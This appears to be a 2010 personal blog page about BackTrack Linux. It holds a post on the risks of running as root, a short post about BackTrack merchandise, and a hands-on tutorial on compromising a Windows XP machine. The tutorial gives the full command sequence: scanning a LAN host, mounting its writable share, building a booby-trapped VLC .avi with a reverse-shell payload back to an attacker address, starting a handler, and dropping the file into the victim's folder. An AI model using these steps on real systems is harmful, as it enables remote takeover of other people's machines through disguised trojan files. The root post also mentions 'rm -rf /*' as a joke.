Wednesday, September 8, 2010

Running as root !?

Ok so a lot of you people like using Backtrack and now that it's debian based and it is possible to use it as a daily OS things have changed a bit.

Now as you know there are a few guides on how to make an unprivileged user in Backtrack.
Unprivileged user in BT
Normally it's good to make an unprivileged users but I must remind you that Backtrack is not a normal OS, most of it's applications must be run as root, it was basically made to run as root and nothing else.
If you ask people if it's ok to run as root, you will get an answer similar to this one: "It's not safe to run as root!", but did anyone tell you why ? or when is it safe to run as root ?

I'm going to try to clarify the risks and all that stuff regarding "Running as root".
Keep in mind that what I am saying here applies to normal desktop PC's or laptops, not servers ....

Ok so let's begin:

Running as root has a bright side as well as a dark side:

***BRIGHT SIDE***

As you know the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions like: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it thinks you know what you are doing ... so if you don't log out now!
This is a good thing because it does not bother you to type sudo for everything which gets annoying after a while.

***DARK SIDE***

Now a lot of people are afraid to run as root, because they might break something ... and this is true, if you run as root and have no clue about what you are doing you might end up with 3 reinstalls per day.
Running as root is not for everyone, you need some advanced skills in using the bash + some advanced knowledge about *nix. Oh and if you can't play in the bash without typing "rm -rf /*" every 20 seconds then close this window and stop reading for your own safety.

So base line. If you are not sure you can handle it and don't want to accidentally lose your important data or stuff don't run as root.

Another thing in running as root, people often say that you should not run as root for security reasons, this is also true. If an attacker gets hold of your system he will be root and he could do anything with your PC, but now I ask you ... how many services do you need running 24/7 on your home PC/laptop ?

Sure there are other ways of getting access to your system, like if you are in a LAN with others, they could try a MITM and maybe sniff your credentials but there are programs to protect you from this kind of attacks, you can even use ettercap for this or arpwatch, I'm sure if you google this things you will come up with something.
Other methods would be to set an ev!l server with metasploit or SET and trick you in clicking it or send an email with some malicious .pdf or I don't know, now if you know you would click every link people give you and read every attachment on your email without scanning it ... close the windows NOW!

Now this are some of the security risks that you need to be aware of when running as root.
Oh and one last thing don't think that if you're not running as root you are completely bullet proof !

Saturday, September 4, 2010

Sickness - Owning a windows xp with metasploit.



Ok so first of all I did not do any video editing, so don't complain about it !
Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.
Third this is a basic video.

So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:
Code:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):
Code:

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:
Code:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Code:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media

Wednesday, September 1, 2010

Backtrack Products.

Well it seems like my 3-4 month signature on the Backtrack forum "I wans a Backtrack T-Shirt!" finally paid off.
This morning archangelamael just told me that I could buy one and a lot of more Backtrack accessories, but why not take a look yourself.

Backtrack Shop